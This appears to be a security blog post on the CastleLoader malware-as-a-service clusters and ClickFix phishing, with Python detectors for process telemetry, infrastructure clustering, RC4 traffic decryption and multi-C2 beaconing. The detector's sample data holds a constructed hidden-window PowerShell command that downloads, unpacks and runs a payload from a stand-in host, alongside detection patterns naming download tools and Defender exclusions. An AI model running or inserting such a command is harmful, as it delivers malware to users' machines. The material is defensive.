CastleLoader MaaS is spreading via ClickFix phishing. See how AI threat detection spots patterns across clusters and blocks loader-driven attacks faster.
AI Defense Against CastleLoader MaaS Phishing
Most companies still treat phishing as an “email problem.” GrayBravo’s CastleLoader ecosystem shows why that mindset is getting expensive.
Recorded Future’s latest research breaks GrayBravo (formerly TAG-150) into four distinct activity clusters that all use CastleLoader, but with different lures, infrastructure, and payloads. That’s the signature of a malware-as-a-service (MaaS) business: the “product” stays consistent while the “customers” tailor campaigns to their niche. For defenders, it means your threat model can’t stop at “block the bad domain.” You need to recognize patterns across campaigns, even when every indicator changes.
This installment in our AI in Cybersecurity series focuses on a practical reality: AI-powered threat detection is built for problems like CastleLoader—high-churn infrastructure, social engineering that shifts weekly, and multi-stage payload chains that don’t look identical twice.
What GrayBravo’s CastleLoader clusters tell us about MaaS
Answer first: When one malware family shows up in multiple campaign styles with minimal overlap in infrastructure, you’re not fighting a single actor—you’re fighting an ecosystem.
Recorded Future identified four CastleLoader activity clusters, each with distinct targeting and delivery:
- TAG-160 (Logistics-focused): Logistics brand impersonation, freight-themed lures, and the ClickFix “copy/paste this command” technique.
- TAG-161 (Booking.com-themed): Booking.com impersonation, ClickFix delivery, and observed delivery of Matanbuchus (itself a paid MaaS downloader).
- Cluster 3 (Booking.com-themed, separate): Similar lure theme, but different plumbing—uses Steam Community profiles as a dead drop resolver to dynamically update C2.
- Cluster 4 (Malvertising/fake software): Fake installers and update prompts (including impersonated admin tools), sometimes with signed MSI packages.
The through-line is CastleLoader: a loader that opens the door for second-stage malware like CastleRAT, infostealers (for example, Rhadamanthys), or commodity RATs. That’s why MaaS is so effective: defenders spend time on the “front door,” while attackers monetize what happens after entry.
Why this matters operationally
Answer first: MaaS forces defenders to prioritize behavior and relationships over single indicators.
If you’re relying on static deny-lists, MaaS will outrun you. GrayBravo’s ecosystem shows:
- High indicator churn: domains rotate, hosting shifts, and legitimate internet services can be abused.
- Multi-tier infrastructure: Tiered servers (including backup tiers) reduce takedown impact.
- Flexible payloading: different operators deliver different second stages depending on the victim and objective.
AI-based systems earn their keep here because they can correlate weak signals—naming patterns, hosting ASNs, redirect infrastructure, endpoint behaviors—into a stronger verdict.
ClickFix is winning because it weaponizes your users’ “helpfulness”
Answer first: ClickFix works because it turns security controls into “instructions,” getting users to execute the attacker’s command for them.
A big theme across the logistics and Booking.com clusters is ClickFix: victims land on a page that looks like a business workflow (sign a document, verify a guest booking, confirm a rate) and are told to copy/paste a command to “fix” a viewing or signing issue.
That’s not a gimmick. It’s a strategy that:
- Bypasses attachment scanning (no attachment)
- Reduces reliance on macro-enabled documents
- Evades some link scanners (the malicious step happens only after user interaction that automated URL crawlers do not perform, so the scanned page itself looks clean)
- Shifts execution to native tooling (often PowerShell)
In TAG-160’s logistics flow, the copied command can download an archive, extract it, and run malware via pythonw.exe while presenting a decoy message. The result is a loader-driven pipeline: CastleLoader first, then whatever the operator wants next.
What AI can detect that rule-based filters often miss
Answer first: AI performs best when the attacker’s “shape” repeats but their content changes.
Here are detection points where AI-driven anomaly detection and classification can outperform brittle signatures:
- Unusual user journeys: email → landing page → form submission → copy/paste command. This is rare in legitimate business processes and can be modeled.
- Copy/paste execution events: endpoint telemetry showing a browser session followed by PowerShell execution with web download and archive extraction.
- Living-off-the-land misuse: suspicious combinations like PowerShell + download + execution + Defender exclusion attempts.
- Cross-campaign reuse: domain registration patterns (typosquats, re-registered domains) and repeated hosting/provider preferences.
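The detection points above can be turned into a concrete check over process-creation telemetry. The following is an added example written for this article, not code from the article or from Recorded Future. The event fields (ts, host, parent_image, image, command_line) are assumptions to be mapped from your EDR or Sysmon Event ID 1 schema, and the sample events, hostnames and .example domains are constructed. It flags the ClickFix execution shape (interactive launcher to shell, web download, archive extraction, next-stage execution) and Defender exclusion attempts separately, and it also correlates a browser start with a shell spawned soon after on the same host, since the Win+R Run dialog launches pasted commands as children of explorer.exe rather than of the browser.

```python
"""Flag ClickFix-style execution chains in process-creation telemetry.

Added example, not code from the article or from Recorded Future. Field
names are assumptions (map them from your EDR / Sysmon Event ID 1 data);
all sample events below are constructed for illustration.
"""
import re
from dataclasses import dataclass

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
# The Win+R "Run" dialog spawns the pasted command under explorer.exe, so the
# browser is usually NOT the direct parent of the shell in a real ClickFix chain.
PASTE_LAUNCHERS = BROWSERS | {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
BROWSER_WINDOW_S = 300  # a shell this soon after a browser start on the same host counts

DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile|Start-BitsTransfer", re.I)
EXTRACT = re.compile(r"Expand-Archive|\btar\b.*-x|\.zip\b", re.I)
NEXT_STAGE = re.compile(r"pythonw?\.exe|Start-Process|\biex\b|Invoke-Expression", re.I)
DEFENDER_EXCL = re.compile(r"Add-MpPreference\s+-Exclusion", re.I)
HIDDEN_OR_ENCODED = re.compile(r"-w(indowstyle)?\s+hidden|-enc\b|-nop\b", re.I)


@dataclass
class ProcEvent:
    ts: int
    host: str
    parent_image: str
    image: str
    command_line: str


def classify(e, recent_browser_ts=None):
    """Return (verdict, reasons) for one event; verdict is None when nothing fires."""
    reasons = []
    parent, image, cl = e.parent_image.lower(), e.image.lower(), e.command_line
    shell = image in SHELLS
    if shell and parent in PASTE_LAUNCHERS:
        reasons.append("launcher-to-shell")
    if shell and recent_browser_ts is not None and 0 <= e.ts - recent_browser_ts <= BROWSER_WINDOW_S:
        reasons.append("browser-then-shell")
    for name, rx in (("web-download", DOWNLOAD), ("archive-extract", EXTRACT),
                     ("next-stage-exec", NEXT_STAGE), ("defender-exclusion", DEFENDER_EXCL),
                     ("hidden-or-encoded", HIDDEN_OR_ENCODED)):
        if rx.search(cl):
            reasons.append(name)
    interactive = "launcher-to-shell" in reasons or "browser-then-shell" in reasons
    staged = "archive-extract" in reasons or "next-stage-exec" in reasons
    if interactive and "web-download" in reasons and staged:
        return "clickfix-chain", reasons
    if "defender-exclusion" in reasons:
        return "defender-exclusion", reasons
    return None, reasons


def detect(events):
    """Run classify() in time order, tracking the last browser start per host."""
    last_browser, alerts = {}, []
    for e in sorted(events, key=lambda x: x.ts):
        if e.image.lower() in BROWSERS:
            last_browser[e.host] = e.ts
        verdict, reasons = classify(e, last_browser.get(e.host))
        if verdict:
            alerts.append({"host": e.host, "ts": e.ts, "verdict": verdict, "reasons": reasons})
    return alerts


# Constructed sample telemetry (hosts, paths and .example domains are made up).
SAMPLE_EVENTS = [
    ProcEvent(100, "WS-17", "explorer.exe", "chrome.exe",
              "chrome.exe https://booking-verify.example/guest"),
    ProcEvent(160, "WS-17", "explorer.exe", "powershell.exe",
              'powershell -w hidden -nop -c "iwr https://cdn-fix.example/fix.zip -OutFile $env:TEMP\\f.zip; '
              'Expand-Archive $env:TEMP\\f.zip $env:TEMP\\f; Start-Process $env:TEMP\\f\\pythonw.exe"'),
    ProcEvent(200, "WS-17", "powershell.exe", "powershell.exe",
              "powershell Add-MpPreference -ExclusionPath $env:TEMP"),
    ProcEvent(300, "WS-22", "explorer.exe", "powershell.exe",
              "powershell -File C:\\scripts\\backup.ps1"),  # admin script: launcher-to-shell only
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The benign WS-22 event shows why the chain requires more than a parent/child match: an administrator running a local script from the Run dialog produces the same parent but no download or staging, so it stays below the verdict line and only the reasons are recorded for hunting.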
A good stance: treat ClickFix as a process anomaly, not merely a phishing lure.
The logistics angle: when cybercrime starts steering real cargo
Answer first: Logistics-targeted malware isn’t just about credentials—it can enable fraud and physical theft.
TAG-160 is notable because it doesn’t “spray and pray.” It mimics how logistics teams actually work: freight quotes, rate confirmations, load scheduling, and platform-based outreach.
The report describes tactics that should make any transportation or supply chain leader uncomfortable:
- Impersonation of known logistics firms using spoofed senders and typosquatted domains
- Abuse of freight-matching platforms (DAT Freight & Analytics and Loadlink) to add legitimacy and source targets
- Re-registration of previously legitimate logistics domains to inherit trust
This blends with a broader trend highlighted in 2024–2025 research: cyber access enabling shipment hijacking. Once an attacker has a foothold or platform access, they can alter communications, redirect pickups, or insert fraudulent instructions.
Practical defense moves for logistics and supply chain organizations
Answer first: You need platform governance plus endpoint containment—email security alone won’t cover this.
If you support logistics operations (or depend on them), prioritize controls that match this threat:
- Platform account hardening: enforce MFA, monitor new account creation, watch for profile changes, and restrict third-party access.
- Business process verification: for load changes or new banking details, require out-of-band verification (not email-thread replies).
- Endpoint guardrails: block or restrict PowerShell for non-admin users (for example with Constrained Language Mode or application control); monitor for scripting launched from browsers or from the Run dialog (explorer.exe) shortly after browser activity.
- AI-driven behavioral detections: alert on copy/paste-to-terminal behaviors and sudden spikes in outbound connections after “document signing.”
In my experience, the fastest win is building detections around workflow anomalies—security teams can tune those with far less noise than generic “phishing” alerts.
Booking.com lures + mailer tooling: attackers are professionalizing the funnel
Answer first: The Booking.com clusters show phishing is now managed like marketing—dashboards, redirects, SMTP pools, proxies, and testing.
TAG-161 doesn’t just send emails; it appears to run phishing with dedicated email and redirect management panels (with Russian-language titles such as “Email Manager” and “Redirect and Email Manager”). Functionality observed includes SMTP configuration, redirect generation, proxy management, worker threads, and logging.
That detail matters because it changes how you should defend:
- You’re not dealing with a single inbox sending a few messages.
- You’re dealing with a campaign platform—and campaign platforms produce repeatable infrastructure patterns.
The report also notes infrastructure concentration in specific ASNs (including those linked by other researchers to bulletproof hosting ecosystems). Even when domains rotate, hosting and operational habits often persist long enough for correlation.
Where AI-driven threat intelligence fits
Answer first: AI is most effective when it fuses weak signals across email, network, identity, and endpoint data.
A practical AI-in-cybersecurity application here is entity resolution:
- Connecting a set of lookalike domains to shared registration patterns
- Connecting redirector infrastructure to mailer panel fingerprints
- Connecting endpoints that show ClickFix execution patterns to known CastleLoader behaviors
Instead of asking “Is this domain malicious?” you ask “Is this activity consistent with the CastleLoader ecosystem?” That shift is the difference between chasing IoCs and breaking campaigns.
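One way to make that shift concrete is to run entity resolution over the infrastructure observations you already collect. The block below is an added example for this article, not code from the article or from Recorded Future, and every domain, IP, ASN, registrar, date and redirector fingerprint in it is constructed. It links two observations on any single strong trait (same hosting IP or same redirector fingerprint) or on enough weak traits together (same ASN, same registrar, registration within a short window, same lure theme), then merges the links with union-find into campaign clusters and returns the reasons for each link so an analyst can see why a domain was grouped.

```python
"""Cluster phishing infrastructure by shared traits (entity resolution).

Added example, not code from the article or from Recorded Future. All
observations, ASNs, registrars, dates and fingerprints are constructed;
the thresholds are assumptions to tune against your own data.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Infra:
    domain: str
    ip: str
    asn: str           # hosting ASN
    registrar: str
    reg_day: int       # registration date as a day number (constructed)
    redirect_fp: str   # fingerprint of the redirector's response shape; "" if unknown
    lure: str          # lure theme seen on the page ("booking", "logistics", ...)


STRONG = ("ip", "redirect_fp")  # one shared strong trait is enough to link
WEAK_MIN = 3                    # weak traits needed when no strong trait matches
REG_WINDOW_DAYS = 7


def link_reasons(a, b):
    """Return the traits tying two observations together; an empty list means unlinked."""
    strong = [f"same {f}" for f in STRONG if getattr(a, f) and getattr(a, f) == getattr(b, f)]
    if strong:
        return strong
    weak = []
    if a.asn == b.asn:
        weak.append("same ASN")
    if a.registrar == b.registrar:
        weak.append("same registrar")
    if abs(a.reg_day - b.reg_day) <= REG_WINDOW_DAYS:
        weak.append("registered within window")
    if a.lure == b.lure:
        weak.append("same lure theme")
    return weak if len(weak) >= WEAK_MIN else []


class DSU:
    """Union-find over observation indexes."""
    def __init__(self, n):
        self.parent = list(range(n))

    def find(self, x):
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]
            x = self.parent[x]
        return x

    def union(self, a, b):
        self.parent[self.find(a)] = self.find(b)


def cluster(observations):
    """Return clusters as sorted lists of domains, with the link reasons per pair."""
    dsu, edges = DSU(len(observations)), {}
    for i in range(len(observations)):
        for j in range(i + 1, len(observations)):
            reasons = link_reasons(observations[i], observations[j])
            if reasons:
                dsu.union(i, j)
                edges[(observations[i].domain, observations[j].domain)] = reasons
    groups = defaultdict(list)
    for i, o in enumerate(observations):
        groups[dsu.find(i)].append(o.domain)
    return sorted((sorted(g) for g in groups.values()), key=lambda g: g[0]), edges


# Constructed observations: two lure themes sharing one ASN but nothing else strong.
SAMPLE_INFRA = [
    Infra("booking-guestcheck.example", "203.0.113.10", "AS64500", "RegA", 10, "fp-red-1", "booking"),
    Infra("bookingconfirm-rates.example", "203.0.113.11", "AS64500", "RegA", 12, "fp-red-1", "booking"),
    Infra("secure-bookng.example", "198.51.100.5", "AS64500", "RegA", 14, "", "booking"),
    Infra("freightco-rateconfirm.example", "203.0.113.30", "AS64500", "RegB", 40, "", "logistics"),
    Infra("loadboard-quotes.example", "203.0.113.40", "AS64500", "RegB", 42, "fp-red-7", "logistics"),
    Infra("hotel-newsletter.example", "192.0.2.9", "AS64501", "RegA", 11, "", "unknown"),
]

if __name__ == "__main__":
    groups, edges = cluster(SAMPLE_INFRA)
    for g in groups:
        print(g)
    for pair, why in edges.items():
        print(pair, why)
```

Note that the logistics and booking domains share an ASN yet land in different clusters: a single weak trait is deliberately not enough, which keeps one bulletproof-hosting provider from collapsing every campaign into one blob, while the unrelated newsletter domain that shares a registrar and a registration week is also left alone.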
CastleRAT and multi-C2 redundancy: assume the attacker planned for takedowns
Answer first: GrayBravo-associated tooling is built to survive disruption, so your response plan must be equally resilient.
CastleRAT, delivered as a second stage, includes variants in C and Python and communicates using a custom protocol with RC4 encryption and hard-coded keys. Recorded Future observed victims communicating with multiple C2 servers nearly simultaneously, implying deliberate redundancy.
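A hard-coded RC4 key cuts both ways: once an analyst pulls the key from a sample, every captured session with every C2 server can be decrypted offline, and if the same key is applied to each message without a per-message nonce (an assumption here; the article does not describe CastleRAT's framing), all messages share one keystream, so XORing two ciphertexts cancels the keystream and leaks plaintext structure even without the key. The block below is an added example, not code from the article or from Recorded Future; the key, the "captured" beacons and their layout are constructed, and nothing in it reflects CastleRAT's actual protocol.

```python
"""RC4 helpers for analysing C2 traffic from a sample with a hard-coded key.

Added example, not from the article or Recorded Future. The key, the
"captured" messages and the BEACON framing are constructed; CastleRAT's
real key and message format are not described here.
"""


def rc4(key, data):
    """Plain RC4 (KSA + PRGA). RC4 is symmetric: the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:        # pseudo-random generation algorithm, XORed with the data
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_capture(key, captured):
    """Decrypt every captured payload with the key recovered from the sample."""
    return [rc4(key, c) for c in captured]


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse_leak(c1, c2):
    """Fixed key, no nonce => identical keystream, so c1 XOR c2 == p1 XOR p2."""
    return xor_bytes(c1, c2)


def known_plaintext_crib(c1, c2, crib):
    """Crib-drag: if `crib` is the prefix of p1, recover the same-length prefix of p2."""
    keystream_prefix = xor_bytes(c1[: len(crib)], crib)
    return xor_bytes(keystream_prefix, c2[: len(crib)])


# Constructed: a hypothetical hard-coded key and two beacons to two different C2 servers.
HYPOTHETICAL_KEY = b"demo-hardcoded-key"
PLAINTEXTS = [b"BEACON|WS-17|203.0.113.50", b"BEACON|WS-17|198.51.100.77"]
CAPTURED = [rc4(HYPOTHETICAL_KEY, p) for p in PLAINTEXTS]  # stands in for pcap payloads

if __name__ == "__main__":
    print(decrypt_capture(HYPOTHETICAL_KEY, CAPTURED))
    print(known_plaintext_crib(CAPTURED[0], CAPTURED[1], b"BEACON|WS-17|"))
```

The practical consequence for response is that a recovered key is worth more than any single C2 IP: it unlocks traffic to the redundant servers too, and the fixed-keystream property is a reason to write network signatures on decrypted message structure rather than on destinations.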
Operationally, that means:
- Blocking one C2 may not stop command-and-control.
- Incident response should hunt for behavioral evidence and persistence, not just known IPs.
- Your detection program should model multi-destination C2 patterns as suspicious, especially when paired with loader behavior.
AI can help by clustering outbound traffic patterns: “new host → new domain → new IP → repeated connections on unusual cadence,” even when each individual destination looks unremarkable.
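The multi-destination pattern described above can be checked directly in flow or proxy logs. The following is an added example for this article, not code from the article or from Recorded Future; the flow records, baseline set and thresholds are constructed and are assumptions to tune. It drops destinations already in the host's baseline, measures the regularity of each remaining destination's connection cadence (coefficient of variation of the gaps), and only raises a verdict when a host talks to two or more regular-cadence destinations during overlapping windows, which is the "nearly simultaneous" multi-C2 shape rather than a single poller or a sequential failover.

```python
"""Spot multi-destination beaconing (redundant C2) in outbound flow records.

Added example, not code from the article or from Recorded Future. Flow
tuples are (ts, src_host, dst, bytes); the records, the baseline and the
thresholds below are constructed assumptions to tune on real traffic.
"""
from collections import defaultdict
from statistics import mean, pstdev

MIN_CONNS = 4   # connections to one destination before cadence is judged
MAX_CV = 0.25   # max coefficient of variation of the gaps to call it "regular"
MIN_DESTS = 2   # regular-cadence destinations needed for a multi-C2 verdict


def cadence(timestamps):
    """Return (mean_gap, cv) for sorted timestamps, or None when there are too few."""
    if len(timestamps) < MIN_CONNS:
        return None
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    m = mean(gaps)
    cv = pstdev(gaps) / m if m else float("inf")
    return m, cv


def find_multi_c2(flows, baseline):
    """Return {host: finding} for hosts beaconing regularly to several new destinations."""
    per_host = defaultdict(lambda: defaultdict(list))
    for ts, host, dst, _nbytes in flows:
        if dst not in baseline:           # ignore destinations the host already used
            per_host[host][dst].append(ts)
    findings = {}
    for host, dests in per_host.items():
        regular = []
        for dst, tss in dests.items():
            tss.sort()
            c = cadence(tss)
            if c and c[1] <= MAX_CV:
                regular.append({"dst": dst, "mean_gap": round(c[0]), "cv": round(c[1], 2),
                                "first": tss[0], "last": tss[-1]})
        if len(regular) < MIN_DESTS:
            continue
        # The regular destinations must be active at the same time; one server
        # taking over after another stops is a different (failover) pattern.
        if max(r["first"] for r in regular) <= min(r["last"] for r in regular):
            findings[host] = {"verdict": "multi-c2-beaconing", "destinations": regular}
    return findings


# Constructed sample data: WS-17 beacons to two new IPs every ~60s at the same time,
# WS-22 polls one new destination regularly, WS-31 browses a new site irregularly.
BASELINE = {"updates.example", "mail.example"}
SAMPLE_FLOWS = [
    (0, "WS-17", "203.0.113.50", 512), (60, "WS-17", "203.0.113.50", 498),
    (121, "WS-17", "203.0.113.50", 530), (179, "WS-17", "203.0.113.50", 511),
    (240, "WS-17", "203.0.113.50", 507),
    (5, "WS-17", "198.51.100.77", 520), (66, "WS-17", "198.51.100.77", 501),
    (125, "WS-17", "198.51.100.77", 515), (186, "WS-17", "198.51.100.77", 499),
    (245, "WS-17", "198.51.100.77", 512),
    (30, "WS-17", "updates.example", 90000),
    (0, "WS-22", "192.0.2.200", 300), (300, "WS-22", "192.0.2.200", 300),
    (600, "WS-22", "192.0.2.200", 300), (900, "WS-22", "192.0.2.200", 300),
    (1200, "WS-22", "192.0.2.200", 300),
    (10, "WS-31", "192.0.2.9", 4000), (15, "WS-31", "192.0.2.9", 12000),
    (300, "WS-31", "192.0.2.9", 800), (305, "WS-31", "192.0.2.9", 9000),
    (900, "WS-31", "192.0.2.9", 700),
]

if __name__ == "__main__":
    for host, finding in find_multi_c2(SAMPLE_FLOWS, BASELINE).items():
        print(host, finding)
```

WS-22 is the reason the rule wants more than one destination: a regular poll to a single new host is what many legitimate agents look like, and alerting on it alone is the alert-fatigue trap the playbook below warns about. Jittered beacons will push the coefficient of variation up, so MAX_CV is the knob to widen once you have measured your own baseline.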
A realistic detection and response playbook for CastleLoader-style threats
Answer first: The fastest path to better outcomes is combining AI triage with a few opinionated controls.
Here’s a field-tested set of steps that map well to CastleLoader, ClickFix, and loader-driven infections:
1) Prevent the copy/paste execution path
- Restrict PowerShell to signed scripts where feasible, and note that execution policy alone does not govern one-liners passed on the command line (the ClickFix case), so pair it with application control or Constrained Language Mode
- Enable tamper protection and monitor for Defender exclusion attempts
- Alert on browser-to-shell parent/child process chains, and on shells spawned under explorer.exe shortly after browser activity (the Win+R Run dialog, a common ClickFix paste target, launches commands as children of explorer.exe)
2) Use AI to reduce alert fatigue, not replace analysts
- Auto-cluster alerts by campaign traits (lure theme, redirect patterns, hosting ASN)
- Prioritize incidents where email + web + endpoint telemetry align into a single narrative
- Summarize incidents into analyst-ready timelines (user action → execution → payload → C2)
3) Harden identity and monitor exfiltration
- Watch for credential theft indicators (new logins, impossible travel, new OAuth grants)
- Monitor outbound traffic to suspicious infrastructure and unusual legitimate services used as staging
4) Treat IoCs as “freshness-limited”
- Keep blocklists, but assume they expire quickly
- Focus on detections that survive infrastructure changes: ClickFix execution flow, loader patterns, multi-C2 behavior
A useful rule of thumb: If the attacker can change it in an afternoon, don’t build your whole defense on it.
What to do next (and what to ask your security team)
CastleLoader’s spread across multiple industries is the point. MaaS makes sophisticated tooling accessible to more operators, and operators are getting better at business-specific deception—logistics today, hospitality tomorrow, something else next quarter.
If you’re evaluating AI in cybersecurity tools, push past “does it detect malware?” and ask:
- Can it correlate email, web, endpoint, and network signals into one incident?
- Can it cluster related activity across rotating domains and IPs?
- Can it explain why it flagged an event, in plain language your team can act on?
If you want a practical starting place, begin with one measurable outcome: reduce time-to-triage for phishing-driven endpoint execution. CastleLoader-style threats thrive in the gap between “user clicked” and “security noticed.” AI can shrink that gap—fast—when it’s deployed against the right behaviors.
Where do you think your organization is most exposed right now: email workflows, endpoint scripting controls, or identity compromise after the initial infection?